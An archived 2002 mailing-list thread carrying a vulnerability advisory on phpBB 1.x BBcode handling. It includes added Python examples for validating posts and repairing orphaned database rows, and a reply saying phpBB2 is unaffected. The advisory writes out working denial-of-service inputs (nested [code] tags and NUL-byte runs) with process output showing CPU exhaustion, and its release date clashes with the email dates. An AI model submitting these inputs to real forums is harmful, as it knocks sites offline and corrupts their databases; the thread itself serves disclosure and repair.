
From security@whitecell.org Fri Apr  5 00:55:48 2002
From: Whitecell Security Systems <security@whitecell.org>
To: "vulnwatch@vulnwatch.org" <vulnwatch@vulnwatch.org>
Date: Thu, 4 Apr 2002 21:21:57 +0800
Subject: [VulnWatch] (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


(WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


Release information
------------------

Release Date: 2001-4-4
Author:   By Whitecell Security Systems (WSS)
          tombkeeper (tombkeeper@whitecell.org)
          alert7     (alert7@whitecell.org)
Homepage: http://www.whitecell.org/


Impact: 
-------- 

WSS has found a vulnerability in PHPBB when PHPBB processes BBcode, which could
enable one user to D.O.S the system and destroy PHPBB databases.


Affected Versions
--------------------

	phpBB Group phpBB 1.4.4
	phpBB Group phpBB 1.4.2
	phpBB Group phpBB 1.4.1
	phpBB Group phpBB 1.4.0
	phpBB Group phpBB 1.2.1
	phpBB Group phpBB 1.2.0
	phpBB Group phpBB 1.0.0
----------------------------

NOT TESTED:
phpBB Group phpBB 2.x


Description:
------------

  phpBB supports nesting BBcode: [code][/code], [quote][/quote], [list][/list].
Unfortunately, there is a mistake in the BBcode processing in functions.php.


Exploit:
----------

1:
submit the following post:

[code]
\0\0\0\0\0\0\0
[/code]

In fact, the following data has been saved to the database after BBcode processing.

[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]

2:
submit the following post:
[code]'\0'*800[/code]

see the system:
whitecell$ top
PID  USER      PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME COMMAND
8643 nobody    13   0   212M  81M 13604 D     8.0 65.7   0:07 httpd

phpbb error message:
Could not enter post text! 

But in fact, two records have already been saved to the database. Now the database
is incomplete. If you browse the forum to see what you posted, phpBB could
report the message: "Could not connect to the forums database."

3:
submit 49 bytes of data:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

type top to see the CPU:
  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME COMMAND
25741 nobody    14   0 11828 9996   416 R    99.9  7.8   2:38 httpd

Experiment environment: linux 2.4.10   Apache/1.3.23   PHP 4.1.2


Vendor
--------

http://www.phpbb.com


Workaround: 
-----------

1: disable BBcode until the vendor fixes it.
2: modify bbencode_code() in functions.php:

// Workaround: match [code]...[/code] in a single non-greedy pass (flags s,i),
// with no nesting support (phpBB's own version handles nested tags).
function bbencode_code($message, $is_html_disabled)
{
	$message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-1>Code:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->", $message);
	return $message;

} // bbencode_code()

REPAIR DATABASE:
If the URL is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following commands to repair it:
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162; -- get the post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;


ABOUT WSS:
------------ 

WSS is a non-profit, free technology organization. We are devoted to
research and demonstration of weaknesses related to network services,
communication security and system security.


Copyright 2002 http://www.whitecell.org/  All rights reserved. 
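
The workaround above replaces nested [code] handling with one non-greedy pass. As an added example that is not the advisory's or phpBB's code, the Python below applies the same idea on the input side: it walks a post's [code] tags once with a depth counter, rejects nested or unbalanced tags and NUL bytes before anything reaches the BBcode processor or the database, and renders accepted posts with the same flat regex the workaround uses. The sample posts are constructed from the exploit section; the function names are my own.

```python
import re

# Constructed sample posts, taken from the exploit section of the advisory
NESTED_POST = "[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]"   # 49 bytes, 3 deep
NUL_POST = "[code]" + "\0" * 800 + "[/code]"
CLEAN_POST = "[code]echo hi[/code] and some text"

# Any [code] or [/code] tag; group 1 is "/" for a closing tag
CODE_TAG = re.compile(r"\[(/?)code\]", re.IGNORECASE)
# Same single-pass, non-greedy, non-nesting match as the advisory's replacement
# bbencode_code(): PHP flags "si" == DOTALL | IGNORECASE
FLAT_CODE = re.compile(r"\[code\](.*?)\[/code\]", re.IGNORECASE | re.DOTALL)


def check_post(text, max_depth=1):
    """Return None if the post is acceptable, otherwise a short reason.

    Walks the [code] tags once with a depth counter, so the check itself is
    linear in the post size no matter how the tags are arranged."""
    depth = 0
    for m in CODE_TAG.finditer(text):
        if m.group(1) == "":                 # opening tag
            depth += 1
            if depth > max_depth:
                return "nested [code] at offset %d" % m.start()
        else:                                # closing tag
            if depth == 0:
                return "unmatched [/code] at offset %d" % m.start()
            depth -= 1
    if depth != 0:
        return "unclosed [code]"
    if "\0" in text:
        return "NUL byte in post"
    return None


def encode_code(text):
    """Flat rendering of [code] blocks, mirroring the workaround regex: one
    pass, no nesting support, so an inner [code] is left as literal text."""
    return FLAT_CODE.sub(lambda m: "<pre>" + m.group(1) + "</pre>", text)
```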
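
The repair section above walks through one topic by hand. As an added example that is not from the advisory, this Python/sqlite3 script generalises it: it finds every row in posts that has no matching posts_text row (the half-written state left behind when the post-text insert fails) and deletes it, then deletes any topic left with no posts. Only the table names and the post_id and topic_id columns come from the advisory; the other columns and the rows are constructed for the example.

```python
import sqlite3

# Stand-in for the three phpBB 1.x tables the advisory's repair steps touch;
# columns other than post_id/topic_id are assumed for this example.
SCHEMA = """
CREATE TABLE topics     (topic_id INTEGER PRIMARY KEY, forum_id INTEGER, topic_title TEXT);
CREATE TABLE posts      (post_id  INTEGER PRIMARY KEY, topic_id INTEGER, poster_id INTEGER);
CREATE TABLE posts_text (post_id  INTEGER PRIMARY KEY, post_text TEXT);
"""


def sample_db():
    """Constructed state: topic 1162 holds only post 6280, whose posts_text
    INSERT failed ("Could not enter post text!"); topic 1163 is healthy."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO topics VALUES (?,?,?)",
                     [(1162, 1, "broken"), (1163, 1, "healthy")])
    conn.executemany("INSERT INTO posts VALUES (?,?,?)",
                     [(6280, 1162, 3), (6281, 1163, 2)])
    conn.executemany("INSERT INTO posts_text VALUES (?,?)",
                     [(6281, "hello")])          # deliberately no row for 6280
    conn.commit()
    return conn


def find_orphan_posts(conn):
    """post_ids that exist in posts but have no posts_text row."""
    rows = conn.execute(
        "SELECT p.post_id FROM posts p "
        "LEFT JOIN posts_text t ON t.post_id = p.post_id "
        "WHERE t.post_id IS NULL ORDER BY p.post_id").fetchall()
    return [r[0] for r in rows]


def repair(conn):
    """Generalisation of the advisory's manual DELETEs: remove every orphan
    post, then every topic that no longer has any post, in one transaction.
    Returns (deleted_post_ids, deleted_topic_ids)."""
    orphans = find_orphan_posts(conn)
    with conn:
        for pid in orphans:
            conn.execute("DELETE FROM posts WHERE post_id = ?", (pid,))
        empty = [r[0] for r in conn.execute(
            "SELECT topic_id FROM topics "
            "WHERE topic_id NOT IN (SELECT topic_id FROM posts) ORDER BY topic_id")]
        for tid in empty:
            conn.execute("DELETE FROM topics WHERE topic_id = ?", (tid,))
    return orphans, empty
```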
From delusi0n@bellsouth.net Fri Apr  5 01:18:55 2002
From: "<-delusion->" <delusi0n@bellsouth.net>
To: security@whitecell.org, bugtraq@securityfocus.com,
    vuln-dev@securityfocus.com
Date: Thu, 4 Apr 2002 17:23:46 -0500
Subject: Re: (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


This particular vulnerability does not work on phpBB2. I tested it out by
posting with [code]"800 \0's goes here"[/code], and it just shows the code
which was 800 \0's in the post. Nothing bad happened to the database or the
processes. So this vulnerability does not work on phpBB2 forums.

-delusion
http://www.digital-delusions.com

----- Original Message -----
From: "Whitecell Security Systems" <security@whitecell.org>
To: <bugtraq@securityfocus.com>; <vuln-dev@securityfocus.com>
Sent: Thursday, April 04, 2002 8:23 AM
Subject: (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


